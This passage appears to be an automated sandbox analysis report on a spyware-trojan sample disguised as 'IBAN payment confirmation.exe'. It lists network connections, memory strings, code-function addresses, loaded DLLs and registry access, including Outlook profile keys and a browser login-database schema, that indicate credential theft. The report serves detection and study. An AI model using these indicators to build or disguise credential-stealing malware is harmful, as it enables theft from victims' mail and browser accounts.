            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2128063923.0000000006A66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2128063923.0000000006A66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49841 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49850 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49903 version: TLS 1.2
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D3

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: IBAN payment confirmation.exe
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,11_2_0040335A
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_00404B100_2_00404B10
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_0040653F0_2_0040653F
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_00404B1011_2_00404B10
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_0040653F11_2_0040653F
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_0011432811_2_00114328
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_0011E6A811_2_0011E6A8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_001127B911_2_001127B9
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_00118DA011_2_00118DA0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_0011596811_2_00115968
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_00115F9011_2_00115F90
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_0011E6A511_2_0011E6A5
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_00112DD111_2_00112DD1
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983AF8011_2_3983AF80
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983A92811_2_3983A928
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39835B2811_2_39835B28
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983160811_2_39831608
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983C62811_2_3983C628
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983518011_2_39835180
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983D78811_2_3983D788
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983EF9011_2_3983EF90
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983EFA011_2_3983EFA0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_398397B911_2_398397B9
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983C1C011_2_3983C1C0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_398397C811_2_398397C8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983C1D011_2_3983C1D0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983F3EC11_2_3983F3EC
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983F3F811_2_3983F3F8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_398315FC11_2_398315FC
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983590811_2_39835908
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983A91911_2_3983A919
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983D32111_2_3983D321
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983D33011_2_3983D330
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983EB4311_2_3983EB43
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983EB4811_2_3983EB48
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983936111_2_39839361
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983BD6811_2_3983BD68
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983937011_2_39839370
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983BD7811_2_3983BD78
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983CA8011_2_3983CA80
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39834CAB11_2_39834CAB
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983A4C011_2_3983A4C0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983CEC811_2_3983CEC8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983A4D011_2_3983A4D0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983CED811_2_3983CED8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983E6ED11_2_3983E6ED
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983E6F011_2_3983E6F0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_398360FE11_2_398360FE
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39839C1111_2_39839C11
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983C61811_2_3983C618
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39839C2011_2_39839C20
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983F84411_2_3983F844
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983F85011_2_3983F850
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983A06811_2_3983A068
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983CA7011_2_3983CA70
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983A07811_2_3983A078
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983AE7811_2_3983AE78
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C998D011_2_39C998D0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C97E4011_2_39C97E40
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C971A811_2_39C971A8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9613011_2_39C96130
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9956811_2_39C99568
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9849011_2_39C98490
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C977F011_2_39C977F0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C939EC11_2_39C939EC
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C939F011_2_39C939F0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C908E411_2_39C908E4
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C908F011_2_39C908F0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9289011_2_39C92890
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9287F11_2_39C9287F
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C94B4811_2_39C94B48
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C94B5011_2_39C94B50
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C98AD811_2_39C98AD8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C98AD511_2_39C98AD5
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C91A4411_2_39C91A44
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C91A5011_2_39C91A50
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C90D4811_2_39C90D48
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C90D3811_2_39C90D38
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C92CD811_2_39C92CD8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C92CE811_2_39C92CE8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C94FA811_2_39C94FA8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C94FA411_2_39C94FA4
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C91E9811_2_39C91E98
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C91EA811_2_39C91EA8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C93E4811_2_39C93E48
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C93E3811_2_39C93E38
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C97E3B11_2_39C97E3B
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9119011_2_39C91190
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C911A011_2_39C911A0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9314011_2_39C93140
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9612311_2_39C96123
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9313011_2_39C93130
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9004011_2_39C90040
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9000611_2_39C90006
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9E02011_2_39C9E020
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9E03011_2_39C9E030
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9230011_2_39C92300
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C922F311_2_39C922F3
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9429311_2_39C94293
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C942A011_2_39C942A0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C915F811_2_39C915F8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C915F011_2_39C915F0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9358811_2_39C93588
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9359811_2_39C93598
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9048811_2_39C90488
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9848C11_2_39C9848C
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9049811_2_39C90498
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C977EC11_2_39C977EC
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C946F811_2_39C946F8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C946F411_2_39C946F4
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C9563C11_2_39C9563C
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3A206E8011_2_3A206E80
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3A20E71011_2_3A20E710
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3A20D55811_2_3A20D558
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3A2080E811_2_3A2080E8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: String function: 00402B3A appears 47 times
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529727295.0000000036D37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs IBAN payment confirmation.exe
            Source: IBAN payment confirmation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045CA
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeFile created: C:\Users\user\selvsikkerJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeMutant created: NULL
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsa5F4.tmpJump to behavior
            Source: IBAN payment confirmation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037054000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037025000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037048000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037033000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037015000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2530405935.0000000037F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: IBAN payment confirmation.exeReversingLabs: Detection: 15%
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeFile read: C:\Users\user\Desktop\IBAN payment confirmation.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\IBAN payment confirmation.exe "C:\Users\user\Desktop\IBAN payment confirmation.exe"
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess created: C:\Users\user\Desktop\IBAN payment confirmation.exe "C:\Users\user\Desktop\IBAN payment confirmation.exe"
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess created: C:\Users\user\Desktop\IBAN payment confirmation.exe "C:\Users\user\Desktop\IBAN payment confirmation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.1943129976.0000000005351000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C939E9 push es; retf 11_2_39C939EA
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C939E0 push es; retf 11_2_39C939E6
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C94F9C push ss; retf 11_2_39C94F9E
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C94FA1 push ss; retf 11_2_39C94FA2
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C97E34 push B439CBF3h; retf 11_2_39C97E39
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_39C94291 push cs; retf 11_2_39C94292
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeFile created: C:\Users\user\AppData\Local\Temp\nsl71F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
